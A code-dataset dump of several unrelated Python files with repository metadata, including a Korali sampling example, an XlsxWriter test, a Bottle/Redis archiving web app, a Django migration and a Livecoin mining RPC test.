# must set the priority before Framework.add() which uses the priority
self.priority = priority
Framework.add(self)
self.mq = collections.deque()
self.init(self, initEvent)
# Run to completion
Framework._event_loop.call_soon_threadsafe(Framework.run)
def postLIFO(self, evt):
self.mq.append(evt)
def postFIFO(self, evt):
self.mq.appendleft(evt)
def pop_msg(self,):
return self.mq.pop()
def has_msgs(self,):
return len(self.mq) > 0
class TimeEvent(object):
def __init__(self, signame):
assert type(signame) == str
self.signal = Signal.register(signame)
self.value = None
def postAt(self, act, abs_time):
assert issubclass(type(act), Ahsm)
self.act = act
self.interval = 0
Framework.addTimeEventAt(self, abs_time)
def postIn(self, act, delta):
assert issubclass(type(act), Ahsm)
self.act = act
self.interval = 0
Framework.addTimeEvent(self, delta)
def postEvery(self, act, delta):
assert issubclass(type(act), Ahsm)
self.act = act
self.interval = delta
Framework.addTimeEvent(self, delta)
def disarm(self):
self.act = None
Framework.removeTimeEvent(self)
from .VcdSpy import VcdSpy
| true | true |
79010c0207408da28515534c467c346ef64752c3 | 1,836 | py | Python | examples/bayesian.inference/reference/run-nested.py | JonathanLehner/korali | 90f97d8e2fed2311f988f39cfe014f23ba7dd6cf | [
"MIT"
] | 43 | 2018-07-26T07:20:42.000Z | 2022-03-02T10:23:12.000Z | examples/bayesian.inference/reference/run-nested.py | JonathanLehner/korali | 90f97d8e2fed2311f988f39cfe014f23ba7dd6cf | [
"MIT"
] | 212 | 2018-09-21T10:44:07.000Z | 2022-03-22T14:33:05.000Z | examples/bayesian.inference/reference/run-nested.py | JonathanLehner/korali | 90f97d8e2fed2311f988f39cfe014f23ba7dd6cf | [
"MIT"
] | 16 | 2018-07-25T15:00:36.000Z | 2022-03-22T14:19:46.000Z | #!/usr/bin/env python3
# In this example, we demonstrate how Korali samples the posterior distribution
# in a bayesian problem where the likelihood is calculated by providing
# reference data points and their objective values.
# Importing the computational model
import sys
sys.path.append('./_model')
from model import *
# Creating new experiment
import korali
e = korali.Experiment()
# Setting up the reference likelihood for the Bayesian Problem
e["Problem"]["Type"] = "Bayesian/Reference"
e["Problem"]["Likelihood Model"] = "Normal"
e["Problem"]["Reference Data"] = getReferenceData()
e["Problem"]["Computational Model"] = lambda sampleData: model(sampleData, getReferencePoints())
# Configuring Nested Sampling parameters
e["Solver"]["Type"] = "Sampler/Nested"
e["Solver"]["Resampling Method"] = "Ellipse"
e["Solver"]["Number Live Points"] = 1500
# Configuring the problem's random distributions
e["Distributions"][0]["Name"] = "Uniform 0"
e["Distributions"][0]["Type"] = "Univariate/Uniform"
e["Distributions"][0]["Minimum"] = 0.0
e["Distributions"][0]["Maximum"] = +5.0
# Configuring the problem's variables and their prior distributions
e["Variables"][0]["Name"] = "a"
e["Variables"][0]["Prior Distribution"] = "Uniform 0"
e["Variables"][1]["Name"] = "b"
e["Variables"][1]["Prior Distribution"] = "Uniform 0"
e["Variables"][2]["Name"] = "[Sigma]"
e["Variables"][2]["Prior Distribution"] = "Uniform 0"
e["File Output"]["Frequency"] = 1000
e["Console Output"]["Frequency"] = 500
e["Console Output"]["Verbosity"] = 'Detailed'
e["Solver"]["Termination Criteria"]["Max Generations"] = 100000
e["Solver"]["Termination Criteria"]["Min Log Evidence Delta"] = 1e-1
# Configuring output settings
e["File Output"]["Path"] = '_korali_result_nested'
# Starting Korali's Engine and running experiment
k = korali.Engine()
k.run(e)
| 33.381818 | 96 | 0.712418 |
import sys
sys.path.append('./_model')
from model import *
import korali
e = korali.Experiment()
e["Problem"]["Type"] = "Bayesian/Reference"
e["Problem"]["Likelihood Model"] = "Normal"
e["Problem"]["Reference Data"] = getReferenceData()
e["Problem"]["Computational Model"] = lambda sampleData: model(sampleData, getReferencePoints())
e["Solver"]["Type"] = "Sampler/Nested"
e["Solver"]["Resampling Method"] = "Ellipse"
e["Solver"]["Number Live Points"] = 1500
e["Distributions"][0]["Name"] = "Uniform 0"
e["Distributions"][0]["Type"] = "Univariate/Uniform"
e["Distributions"][0]["Minimum"] = 0.0
e["Distributions"][0]["Maximum"] = +5.0
# Configuring the problem's variables and their prior distributions
e["Variables"][0]["Name"] = "a"
e["Variables"][0]["Prior Distribution"] = "Uniform 0"
e["Variables"][1]["Name"] = "b"
e["Variables"][1]["Prior Distribution"] = "Uniform 0"
e["Variables"][2]["Name"] = "[Sigma]"
e["Variables"][2]["Prior Distribution"] = "Uniform 0"
e["File Output"]["Frequency"] = 1000
e["Console Output"]["Frequency"] = 500
e["Console Output"]["Verbosity"] = 'Detailed'
e["Solver"]["Termination Criteria"]["Max Generations"] = 100000
e["Solver"]["Termination Criteria"]["Min Log Evidence Delta"] = 1e-1
e["File Output"]["Path"] = '_korali_result_nested'
k = korali.Engine()
k.run(e)
| true | true |
79010c959b42f908fa66615dfe288111925993ee | 402 | py | Python | bruges/util/__init__.py | EvanBianco/bruges | 344238775961369740d36ee9aea368be006ba7fe | [
"Apache-2.0"
] | 209 | 2015-07-16T18:23:42.000Z | 2022-02-27T02:59:46.000Z | bruges/util/__init__.py | EvanBianco/bruges | 344238775961369740d36ee9aea368be006ba7fe | [
"Apache-2.0"
] | 74 | 2015-07-12T16:12:01.000Z | 2022-02-22T14:27:26.000Z | bruges/util/__init__.py | agilescientific/bruges | a94ec307bac5e343680c63b315d43ef8b05ee4a1 | [
"Apache-2.0"
] | 112 | 2015-08-07T14:12:11.000Z | 2022-02-10T14:12:50.000Z | from .util import rms
from .util import moving_average
from .util import moving_avg_conv
from .util import moving_avg_fft
from .util import normalize
from .util import next_pow2
from .util import top_and_tail
from .util import extrapolate
from .util import nearest
from .util import deprecated
from .util import apply_along_axis
from .util import sigmoid
from .util import power
from .util import root
| 26.8 | 34 | 0.825871 | from .util import rms
from .util import moving_average
from .util import moving_avg_conv
from .util import moving_avg_fft
from .util import normalize
from .util import next_pow2
from .util import top_and_tail
from .util import extrapolate
from .util import nearest
from .util import deprecated
from .util import apply_along_axis
from .util import sigmoid
from .util import power
from .util import root
| true | true |
79010caebcd9e060069a269d44301af6d68bad2d | 911 | py | Python | xlsxwriter/test/comparison/test_default_row03.py | timgates42/XlsxWriter | 129044ed821de67895b4562c6b71f90eba5be6b4 | [
"BSD-2-Clause-FreeBSD"
] | null | null | null | xlsxwriter/test/comparison/test_default_row03.py | timgates42/XlsxWriter | 129044ed821de67895b4562c6b71f90eba5be6b4 | [
"BSD-2-Clause-FreeBSD"
] | null | null | null | xlsxwriter/test/comparison/test_default_row03.py | timgates42/XlsxWriter | 129044ed821de67895b4562c6b71f90eba5be6b4 | [
"BSD-2-Clause-FreeBSD"
] | null | null | null | ###############################################################################
#
# Tests for XlsxWriter.
#
# Copyright (c), 2013-2020, John McNamara, jmcnamara@cpan.org
#
from ..excel_comparsion_test import ExcelComparisonTest
from ...workbook import Workbook
class TestCompareXLSXFiles(ExcelComparisonTest):
"""
Test file created by XlsxWriter against a file created by Excel.
"""
def setUp(self):
self.set_filename('default_row03.xlsx')
def test_create_file(self):
"""Test the creation of a simple XlsxWriter file."""
workbook = Workbook(self.got_filename)
worksheet = workbook.add_worksheet()
worksheet.set_default_row(24, 1)
worksheet.write('A1', 'Foo')
worksheet.write('A10', 'Bar')
for row in range(1, 8 + 1):
worksheet.set_row(row, 24)
workbook.close()
self.assertExcelEqual()
| 22.775 | 79 | 0.593853 | true | true | |
79010cb1b045ae5add7ef48709cc5cd240c0a5a5 | 3,898 | py | Python | web/app.py | ikreymer/archivethiswebsite | 0c6a3da6d822ffbd979769c78c9bc7254510697d | [
"MIT"
] | 4 | 2015-06-03T20:18:39.000Z | 2015-06-12T16:12:12.000Z | web/app.py | n0ncetonic/browsertrix | a822cfe2be38ebd6a7e4b61904473600d21950bf | [
"MIT"
] | null | null | null | web/app.py | n0ncetonic/browsertrix | a822cfe2be38ebd6a7e4b61904473600d21950bf | [
"MIT"
] | null | null | null | from bottle import route, Route, request, default_app, view, HTTPError, response
from redis import StrictRedis
from redis.utils import pipeline
import json
import uwsgi
import os
import logging
import requests
from config import get_config
from worker import get_cache_key, get_wait_key, get_queue_key
from worker import init_redis
application = None
ERROR_RESP = {'archived': False, 'queued': False, 'error': {'msg': 'unknown'}}
def init():
""" Init the application and add routes """
logging.basicConfig(format='%(asctime)s: [%(levelname)s]: %(message)s',
level=logging.DEBUG)
global theconfig
theconfig = get_config()
global rc
rc = init_redis(theconfig)
app = default_app()
return app
@route(['/', '/index.html', '/index.htm'])
@view('index')
def home():
return {'archives': theconfig['archives'],
'default_archive': theconfig.get('default_archive')}
def get_params():
url = request.query.get('url')
archive = request.query.get('archive')
browser_type = request.query.get('browser', 'chrome')
if not url:
raise HTTPError(status=400, body='No url= specified')
if archive not in theconfig['archives']:
raise HTTPError(status=400, body='No archive {0}'.format(archive))
if not url.startswith(('http://', 'https://')):
url = 'http://' + url
return browser_type, archive, url
@route('/archivepage')
def archive_page():
browser_type, archive, url = get_params()
response_key = get_cache_key(archive, browser_type, url)
wait_key = get_wait_key(archive, browser_type, url)
queue_key = get_queue_key(browser_type)
result = None
if not rc.exists(response_key):
cmd = dict(request.query)
cmd['url'] = url
num = rc.incr('total_urls:' + browser_type)
cmd['num'] = num
cmd = json.dumps(cmd)
with pipeline(rc) as pi:
waiting_str = {'archived': False,
'queued': True,
'num': num}
pi.set(response_key, json.dumps(waiting_str))
pi.rpush(queue_key, cmd)
rc.blpop(wait_key, theconfig['wait_timeout_secs'])
result = rc.get(response_key)
if result:
result = json.loads(result)
if 'queued' in result:
result['queue_pos'] = 0
front = rc.lindex(queue_key, 0)
if front:
front = json.loads(front)
front_num = front.get('num', 0)
# pos == 1 implies this url is next up
# pos <= 0 implies this url was removed from queue and is being processed
pos = result['num'] - front_num + 1
result['queue_pos'] = pos
else:
result['ttl'] = rc.ttl(response_key)
else:
result = ERROR_RESP
return result
@route('/download')
def download():
browser_type, archive, url = get_params()
response_key = get_cache_key(archive, browser_type, url)
result = rc.get(response_key)
if not result:
raise HTTPError(status=404, body='Url Not Archived')
result = json.loads(result)
if not 'download_url' in result:
raise HTTPError(status=404, body='Download Not Available')
headers = {}
session = result.get('download_session')
if session:
headers['Cookie'] = session
r = requests.get(result['download_url'],
headers=headers,
stream=True)
if r.status_code != 200:
raise HTTPError(status=400, body='Invalid Download Result: {0} {1}'.format(r.status_code, r.reason))
pass_headers = ('Content-Disposition', 'Content-Length', 'Content-Type')
for h in pass_headers:
response.set_header(h, r.headers.get(h))
response.body = r.iter_content()
return response
application = init()
| 24.670886 | 108 | 0.611339 | from bottle import route, Route, request, default_app, view, HTTPError, response
from redis import StrictRedis
from redis.utils import pipeline
import json
import uwsgi
import os
import logging
import requests
from config import get_config
from worker import get_cache_key, get_wait_key, get_queue_key
from worker import init_redis
application = None
ERROR_RESP = {'archived': False, 'queued': False, 'error': {'msg': 'unknown'}}
def init():
logging.basicConfig(format='%(asctime)s: [%(levelname)s]: %(message)s',
level=logging.DEBUG)
global theconfig
theconfig = get_config()
global rc
rc = init_redis(theconfig)
app = default_app()
return app
@route(['/', '/index.html', '/index.htm'])
@view('index')
def home():
return {'archives': theconfig['archives'],
'default_archive': theconfig.get('default_archive')}
def get_params():
url = request.query.get('url')
archive = request.query.get('archive')
browser_type = request.query.get('browser', 'chrome')
if not url:
raise HTTPError(status=400, body='No url= specified')
if archive not in theconfig['archives']:
raise HTTPError(status=400, body='No archive {0}'.format(archive))
if not url.startswith(('http://', 'https://')):
url = 'http://' + url
return browser_type, archive, url
@route('/archivepage')
def archive_page():
browser_type, archive, url = get_params()
response_key = get_cache_key(archive, browser_type, url)
wait_key = get_wait_key(archive, browser_type, url)
queue_key = get_queue_key(browser_type)
result = None
if not rc.exists(response_key):
cmd = dict(request.query)
cmd['url'] = url
num = rc.incr('total_urls:' + browser_type)
cmd['num'] = num
cmd = json.dumps(cmd)
with pipeline(rc) as pi:
waiting_str = {'archived': False,
'queued': True,
'num': num}
pi.set(response_key, json.dumps(waiting_str))
pi.rpush(queue_key, cmd)
rc.blpop(wait_key, theconfig['wait_timeout_secs'])
result = rc.get(response_key)
if result:
result = json.loads(result)
if 'queued' in result:
result['queue_pos'] = 0
front = rc.lindex(queue_key, 0)
if front:
front = json.loads(front)
front_num = front.get('num', 0)
pos = result['num'] - front_num + 1
result['queue_pos'] = pos
else:
result['ttl'] = rc.ttl(response_key)
else:
result = ERROR_RESP
return result
@route('/download')
def download():
browser_type, archive, url = get_params()
response_key = get_cache_key(archive, browser_type, url)
result = rc.get(response_key)
if not result:
raise HTTPError(status=404, body='Url Not Archived')
result = json.loads(result)
if not 'download_url' in result:
raise HTTPError(status=404, body='Download Not Available')
headers = {}
session = result.get('download_session')
if session:
headers['Cookie'] = session
r = requests.get(result['download_url'],
headers=headers,
stream=True)
if r.status_code != 200:
raise HTTPError(status=400, body='Invalid Download Result: {0} {1}'.format(r.status_code, r.reason))
pass_headers = ('Content-Disposition', 'Content-Length', 'Content-Type')
for h in pass_headers:
response.set_header(h, r.headers.get(h))
response.body = r.iter_content()
return response
application = init()
| true | true |
79010d0d278cd90214a5a220bbd49e8f62be8006 | 2,014 | py | Python | python/kata04/test_temp.py | notapresent/codekata | b5cd1ec1b858e4dfbf078df8a99c3209cb8313f3 | [
"MIT"
] | null | null | null | python/kata04/test_temp.py | notapresent/codekata | b5cd1ec1b858e4dfbf078df8a99c3209cb8313f3 | [
"MIT"
] | null | null | null | python/kata04/test_temp.py | notapresent/codekata | b5cd1ec1b858e4dfbf078df8a99c3209cb8313f3 | [
"MIT"
] | null | null | null | import pytest
from temp import (download_to_file, ensure_datafile, records_from_lines, make_record, make_value, min_spread_record,
min_spread_day_num, parse_header)
def test_download_to_file(tmpdir):
file = tmpdir.join('test.txt')
download_to_file(file.strpath, 'https://httpbin.org/get?testParam=1')
assert 'testParam' in file.read()
def test_ensure_datafile_downloads(tmpdir):
file = tmpdir.join('test.txt')
ensure_datafile(file.strpath, 'https://httpbin.org/get?testParam=1')
assert 'testParam' in file.read()
def test_ensure_datafile_uses_existing(tmpdir):
file = tmpdir.join('test.txt')
file.write('content')
ensure_datafile(file.strpath, 'https://httpbin.org/get?testParam=1')
assert file.read() == 'content'
def test_make_record():
header = {'One': (0, 1), 'Two': (3, 3), 'Three': (7, 2), 'Four': (10, 4)}
line = "1 2.2 3* FOUR"
rv = make_record(header, line)
assert set(rv.keys()) == set(header)
assert all(list(rv.values()))
def test_parse_header_rv():
rv = parse_header(" One Two Three")
assert len(rv) == 3
assert rv['One'] == (1, 4)
assert rv['Two'] == (5, 4)
assert rv['Three'] == (9, 6)
def test_make_value():
assert make_value('123') == 123
assert make_value('ASDF') == 'ASDF'
assert make_value('123.45') == 123.45
assert make_value('123*') == 123
assert make_value(' ') == None
def test_records_from_lines_skips_empty():
lines = iter(['One', ' ', 'Two'])
assert len(list(records_from_lines(lines))) == 1
def test_min_spread_record_rv():
records = [
{'max': 10, 'min': 0},
{'max': 1, 'min': 0}, # this one should be returned
{'max': None, 'min': None}
]
assert min_spread_record(records, 'max', 'min') == {'max': 1, 'min': 0}
def test_min_spread_day_num_rv():
records = [
{'Dy': 1, 'MxT': 10, 'MnT': 0},
{'Dy': 2, 'MxT': 5, 'MnT': 0},
]
rv = min_spread_day_num(records)
assert rv == 2
| 28.366197 | 116 | 0.619662 | import pytest
from temp import (download_to_file, ensure_datafile, records_from_lines, make_record, make_value, min_spread_record,
min_spread_day_num, parse_header)
def test_download_to_file(tmpdir):
file = tmpdir.join('test.txt')
download_to_file(file.strpath, 'https://httpbin.org/get?testParam=1')
assert 'testParam' in file.read()
def test_ensure_datafile_downloads(tmpdir):
file = tmpdir.join('test.txt')
ensure_datafile(file.strpath, 'https://httpbin.org/get?testParam=1')
assert 'testParam' in file.read()
def test_ensure_datafile_uses_existing(tmpdir):
file = tmpdir.join('test.txt')
file.write('content')
ensure_datafile(file.strpath, 'https://httpbin.org/get?testParam=1')
assert file.read() == 'content'
def test_make_record():
header = {'One': (0, 1), 'Two': (3, 3), 'Three': (7, 2), 'Four': (10, 4)}
line = "1 2.2 3* FOUR"
rv = make_record(header, line)
assert set(rv.keys()) == set(header)
assert all(list(rv.values()))
def test_parse_header_rv():
rv = parse_header(" One Two Three")
assert len(rv) == 3
assert rv['One'] == (1, 4)
assert rv['Two'] == (5, 4)
assert rv['Three'] == (9, 6)
def test_make_value():
assert make_value('123') == 123
assert make_value('ASDF') == 'ASDF'
assert make_value('123.45') == 123.45
assert make_value('123*') == 123
assert make_value(' ') == None
def test_records_from_lines_skips_empty():
lines = iter(['One', ' ', 'Two'])
assert len(list(records_from_lines(lines))) == 1
def test_min_spread_record_rv():
records = [
{'max': 10, 'min': 0},
{'max': 1, 'min': 0},
{'max': None, 'min': None}
]
assert min_spread_record(records, 'max', 'min') == {'max': 1, 'min': 0}
def test_min_spread_day_num_rv():
records = [
{'Dy': 1, 'MxT': 10, 'MnT': 0},
{'Dy': 2, 'MxT': 5, 'MnT': 0},
]
rv = min_spread_day_num(records)
assert rv == 2
| true | true |
79010d69056dd11c86b0becb5e9e2295e0808861 | 2,355 | py | Python | rl/env/multiagent_particle_envs/multiagent/multi_discrete.py | unkper/PedestrainSimulationModule | 039ed0903a0861130566d8d1d862594064b8e0db | [
"MIT"
] | null | null | null | rl/env/multiagent_particle_envs/multiagent/multi_discrete.py | unkper/PedestrainSimulationModule | 039ed0903a0861130566d8d1d862594064b8e0db | [
"MIT"
] | null | null | null | rl/env/multiagent_particle_envs/multiagent/multi_discrete.py | unkper/PedestrainSimulationModule | 039ed0903a0861130566d8d1d862594064b8e0db | [
"MIT"
] | null | null | null | # An old version of OpenAI Gym's multi_discrete.py. (Was getting affected by Gym updates)
# (https://github.com/openai/gym/blob/1fb81d4e3fb780ccf77fec731287ba07da35eb84/gym/spaces/multi_discrete.py)
import numpy as np
import gym
class MultiDiscrete(gym.Space):
"""
- The multi-discrete action space consists of a series of discrete action spaces with different parameters
- It can be adapted to both a Discrete action space or a continuous (Box) action space
- It is useful to represent game controllers or keyboards where each key can be represented as a discrete action space
- It is parametrized by passing an array of arrays containing [min, max] for each discrete action space
where the discrete action space can take any integers from `min` to `max` (both inclusive)
Note: A value of 0 always need to represent the NOOP action.
e.g. Nintendo Game Controller
- Can be conceptualized as 3 discrete action spaces:
1) Arrow Keys: Discrete 5 - NOOP[0], UP[1], RIGHT[2], DOWN[3], LEFT[4] - params: min: 0, max: 4
2) Button A: Discrete 2 - NOOP[0], Pressed[1] - params: min: 0, max: 1
3) Button B: Discrete 2 - NOOP[0], Pressed[1] - params: min: 0, max: 1
- Can be initialized as
MultiDiscrete([ [0,4], [0,1], [0,1] ])
"""
def __init__(self, array_of_param_array):
self.low = np.array([x[0] for x in array_of_param_array])
self.high = np.array([x[1] for x in array_of_param_array])
self.num_discrete_space = self.low.shape[0]
def sample(self):
""" Returns a array with one sample from each discrete action space """
# For each row: round(random .* (max - min) + min, 0)
np_random = np.random.RandomState()
random_array = np_random.rand(self.num_discrete_space)
return [int(x) for x in np.floor(np.multiply((self.high - self.low + 1.), random_array) + self.low)]
def contains(self, x):
return len(x) == self.num_discrete_space and (np.array(x) >= self.low).all() and (np.array(x) <= self.high).all()
@property
def shape(self):
return self.num_discrete_space
def __repr__(self):
return "MultiDiscrete" + str(self.num_discrete_space)
def __eq__(self, other):
return np.array_equal(self.low, other.low) and np.array_equal(self.high, other.high) | 53.522727 | 122 | 0.675159 |
# (https://github.com/openai/gym/blob/1fb81d4e3fb780ccf77fec731287ba07da35eb84/gym/spaces/multi_discrete.py)
import numpy as np
import gym
class MultiDiscrete(gym.Space):
def __init__(self, array_of_param_array):
self.low = np.array([x[0] for x in array_of_param_array])
self.high = np.array([x[1] for x in array_of_param_array])
self.num_discrete_space = self.low.shape[0]
def sample(self):
# For each row: round(random .* (max - min) + min, 0)
np_random = np.random.RandomState()
random_array = np_random.rand(self.num_discrete_space)
return [int(x) for x in np.floor(np.multiply((self.high - self.low + 1.), random_array) + self.low)]
def contains(self, x):
return len(x) == self.num_discrete_space and (np.array(x) >= self.low).all() and (np.array(x) <= self.high).all()
@property
def shape(self):
return self.num_discrete_space
def __repr__(self):
return "MultiDiscrete" + str(self.num_discrete_space)
def __eq__(self, other):
return np.array_equal(self.low, other.low) and np.array_equal(self.high, other.high) | true | true |
79010d9d3f788353d118f2ed0c14776fa1c23768 | 1,389 | py | Python | lowfat/migrations/0090_auto_20170307_1518.py | elena-kolomeets/lowfat | f7647f5cd12519f722e41808157a96cc3e37b6ce | [
"BSD-3-Clause"
] | 6 | 2017-02-23T16:44:36.000Z | 2019-03-18T11:39:03.000Z | lowfat/migrations/0090_auto_20170307_1518.py | elena-kolomeets/lowfat | f7647f5cd12519f722e41808157a96cc3e37b6ce | [
"BSD-3-Clause"
] | 286 | 2017-02-07T15:00:41.000Z | 2022-03-08T12:56:09.000Z | lowfat/migrations/0090_auto_20170307_1518.py | elena-kolomeets/lowfat | f7647f5cd12519f722e41808157a96cc3e37b6ce | [
"BSD-3-Clause"
] | 2 | 2018-06-19T12:38:08.000Z | 2020-11-23T12:15:08.000Z | # -*- coding: utf-8 -*-
# Generated by Django 1.10.5 on 2017-03-07 15:18
from __future__ import unicode_literals
from django.db import migrations, models
import django.db.models.deletion
def add_author_to_blog(apps, schema_editor): # pylint: disable=unused-argument
"""Author is the claimant"""
Blog = apps.get_model("lowfat", "Blog") # pylint: disable=invalid-name
for blog in Blog.objects.all():
blog.author = blog.fund.claimant
blog.save()
class Migration(migrations.Migration):
dependencies = [
('lowfat', '0089_auto_20170306_1706'),
]
operations = [
migrations.AddField(
model_name='blog',
name='author',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to='lowfat.Claimant'),
),
migrations.AddField(
model_name='historicalblog',
name='author',
field=models.ForeignKey(blank=True, db_constraint=False, null=True, on_delete=django.db.models.deletion.DO_NOTHING, related_name='+', to='lowfat.Claimant'),
),
migrations.AlterField(
model_name='blog',
name='fund',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to='lowfat.Fund'),
),
migrations.RunPython(add_author_to_blog),
]
| 35.615385 | 168 | 0.645788 |
from __future__ import unicode_literals
from django.db import migrations, models
import django.db.models.deletion
def add_author_to_blog(apps, schema_editor):
Blog = apps.get_model("lowfat", "Blog")
for blog in Blog.objects.all():
blog.author = blog.fund.claimant
blog.save()
class Migration(migrations.Migration):
dependencies = [
('lowfat', '0089_auto_20170306_1706'),
]
operations = [
migrations.AddField(
model_name='blog',
name='author',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to='lowfat.Claimant'),
),
migrations.AddField(
model_name='historicalblog',
name='author',
field=models.ForeignKey(blank=True, db_constraint=False, null=True, on_delete=django.db.models.deletion.DO_NOTHING, related_name='+', to='lowfat.Claimant'),
),
migrations.AlterField(
model_name='blog',
name='fund',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to='lowfat.Fund'),
),
migrations.RunPython(add_author_to_blog),
]
| true | true |
79010de06d633480247f5d160a4de1a7c3315b9f | 5,584 | py | Python | test/functional/mining_basic.py | elliottminns/livecoin | 0d9f12023e113c68501ddd3da5a7b7afebce9a3d | [
"MIT"
] | null | null | null | test/functional/mining_basic.py | elliottminns/livecoin | 0d9f12023e113c68501ddd3da5a7b7afebce9a3d | [
"MIT"
] | null | null | null | test/functional/mining_basic.py | elliottminns/livecoin | 0d9f12023e113c68501ddd3da5a7b7afebce9a3d | [
"MIT"
] | null | null | null | #!/usr/bin/env python3
# Copyright (c) 2014-2017 The Bitcoin Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
"""Test mining RPCs
- getmininginfo
- getblocktemplate proposal mode
- submitblock"""
import copy
from binascii import b2a_hex
from decimal import Decimal
from test_framework.blocktools import create_coinbase
from test_framework.mininode import CBlock
from test_framework.test_framework import LivecoinTestFramework
from test_framework.util import assert_equal, assert_raises_rpc_error
def b2x(b):
return b2a_hex(b).decode('ascii')
def assert_template(node, block, expect, rehash=True):
if rehash:
block.hashMerkleRoot = block.calc_merkle_root()
rsp = node.getblocktemplate({'data': b2x(block.serialize()), 'mode': 'proposal'})
assert_equal(rsp, expect)
class MiningTest(LivecoinTestFramework):
def set_test_params(self):
self.num_nodes = 2
self.setup_clean_chain = False
def run_test(self):
node = self.nodes[0]
self.log.info('getmininginfo')
mining_info = node.getmininginfo()
assert_equal(mining_info['blocks'], 200)
assert_equal(mining_info['chain'], 'regtest')
assert_equal(mining_info['currentblocktx'], 0)
assert_equal(mining_info['currentblockweight'], 0)
assert_equal(mining_info['difficulty'], Decimal('4.656542373906925E-10'))
assert_equal(mining_info['networkhashps'], Decimal('0.003333333333333334'))
assert_equal(mining_info['pooledtx'], 0)
# Mine a block to leave initial block download
node.generate(1)
tmpl = node.getblocktemplate()
self.log.info("getblocktemplate: Test capability advertised")
assert 'proposal' in tmpl['capabilities']
assert 'coinbasetxn' not in tmpl
coinbase_tx = create_coinbase(height=int(tmpl["height"]) + 1)
# sequence numbers must not be max for nLockTime to have effect
coinbase_tx.vin[0].nSequence = 2 ** 32 - 2
coinbase_tx.rehash()
block = CBlock()
block.nVersion = tmpl["version"]
block.hashPrevBlock = int(tmpl["previousblockhash"], 16)
block.nTime = tmpl["curtime"]
block.nBits = int(tmpl["bits"], 16)
block.nNonce = 0
block.vtx = [coinbase_tx]
self.log.info("getblocktemplate: Test valid block")
assert_template(node, block, None)
self.log.info("submitblock: Test block decode failure")
assert_raises_rpc_error(-22, "Block decode failed", node.submitblock, b2x(block.serialize()[:-15]))
self.log.info("getblocktemplate: Test bad input hash for coinbase transaction")
bad_block = copy.deepcopy(block)
bad_block.vtx[0].vin[0].prevout.hash += 1
bad_block.vtx[0].rehash()
assert_template(node, bad_block, 'bad-cb-missing')
self.log.info("submitblock: Test invalid coinbase transaction")
assert_raises_rpc_error(-22, "Block does not start with a coinbase", node.submitblock, b2x(bad_block.serialize()))
self.log.info("getblocktemplate: Test truncated final transaction")
assert_raises_rpc_error(-22, "Block decode failed", node.getblocktemplate, {'data': b2x(block.serialize()[:-1]), 'mode': 'proposal'})
self.log.info("getblocktemplate: Test duplicate transaction")
bad_block = copy.deepcopy(block)
bad_block.vtx.append(bad_block.vtx[0])
assert_template(node, bad_block, 'bad-txns-duplicate')
self.log.info("getblocktemplate: Test invalid transaction")
bad_block = copy.deepcopy(block)
bad_tx = copy.deepcopy(bad_block.vtx[0])
bad_tx.vin[0].prevout.hash = 255
bad_tx.rehash()
bad_block.vtx.append(bad_tx)
assert_template(node, bad_block, 'bad-txns-inputs-missingorspent')
self.log.info("getblocktemplate: Test nonfinal transaction")
bad_block = copy.deepcopy(block)
bad_block.vtx[0].nLockTime = 2 ** 32 - 1
bad_block.vtx[0].rehash()
assert_template(node, bad_block, 'bad-txns-nonfinal')
self.log.info("getblocktemplate: Test bad tx count")
# The tx count is immediately after the block header
TX_COUNT_OFFSET = 80
bad_block_sn = bytearray(block.serialize())
assert_equal(bad_block_sn[TX_COUNT_OFFSET], 1)
bad_block_sn[TX_COUNT_OFFSET] += 1
assert_raises_rpc_error(-22, "Block decode failed", node.getblocktemplate, {'data': b2x(bad_block_sn), 'mode': 'proposal'})
self.log.info("getblocktemplate: Test bad bits")
bad_block = copy.deepcopy(block)
bad_block.nBits = 469762303 # impossible in the real world
assert_template(node, bad_block, 'bad-diffbits')
self.log.info("getblocktemplate: Test bad merkle root")
bad_block = copy.deepcopy(block)
bad_block.hashMerkleRoot += 1
assert_template(node, bad_block, 'bad-txnmrklroot', False)
self.log.info("getblocktemplate: Test bad timestamps")
bad_block = copy.deepcopy(block)
bad_block.nTime = 2 ** 31 - 1
assert_template(node, bad_block, 'time-too-new')
bad_block.nTime = 0
assert_template(node, bad_block, 'time-too-old')
self.log.info("getblocktemplate: Test not best block")
bad_block = copy.deepcopy(block)
bad_block.hashPrevBlock = 123
assert_template(node, bad_block, 'inconclusive-not-best-prevblk')
if __name__ == '__main__':
MiningTest().main()
| 41.058824 | 141 | 0.681411 |
import copy
from binascii import b2a_hex
from decimal import Decimal
from test_framework.blocktools import create_coinbase
from test_framework.mininode import CBlock
from test_framework.test_framework import LivecoinTestFramework
from test_framework.util import assert_equal, assert_raises_rpc_error
def b2x(b):
return b2a_hex(b).decode('ascii')
def assert_template(node, block, expect, rehash=True):
if rehash:
block.hashMerkleRoot = block.calc_merkle_root()
rsp = node.getblocktemplate({'data': b2x(block.serialize()), 'mode': 'proposal'})
assert_equal(rsp, expect)
class MiningTest(LivecoinTestFramework):
def set_test_params(self):
self.num_nodes = 2
self.setup_clean_chain = False
def run_test(self):
node = self.nodes[0]
self.log.info('getmininginfo')
mining_info = node.getmininginfo()
assert_equal(mining_info['blocks'], 200)
assert_equal(mining_info['chain'], 'regtest')
assert_equal(mining_info['currentblocktx'], 0)
assert_equal(mining_info['currentblockweight'], 0)
assert_equal(mining_info['difficulty'], Decimal('4.656542373906925E-10'))
assert_equal(mining_info['networkhashps'], Decimal('0.003333333333333334'))
assert_equal(mining_info['pooledtx'], 0)
node.generate(1)
tmpl = node.getblocktemplate()
self.log.info("getblocktemplate: Test capability advertised")
assert 'proposal' in tmpl['capabilities']
assert 'coinbasetxn' not in tmpl
coinbase_tx = create_coinbase(height=int(tmpl["height"]) + 1)
coinbase_tx.vin[0].nSequence = 2 ** 32 - 2
coinbase_tx.rehash()
block = CBlock()
block.nVersion = tmpl["version"]
block.hashPrevBlock = int(tmpl["previousblockhash"], 16)
block.nTime = tmpl["curtime"]
block.nBits = int(tmpl["bits"], 16)
block.nNonce = 0
block.vtx = [coinbase_tx]
self.log.info("getblocktemplate: Test valid block")
assert_template(node, block, None)
self.log.info("submitblock: Test block decode failure")
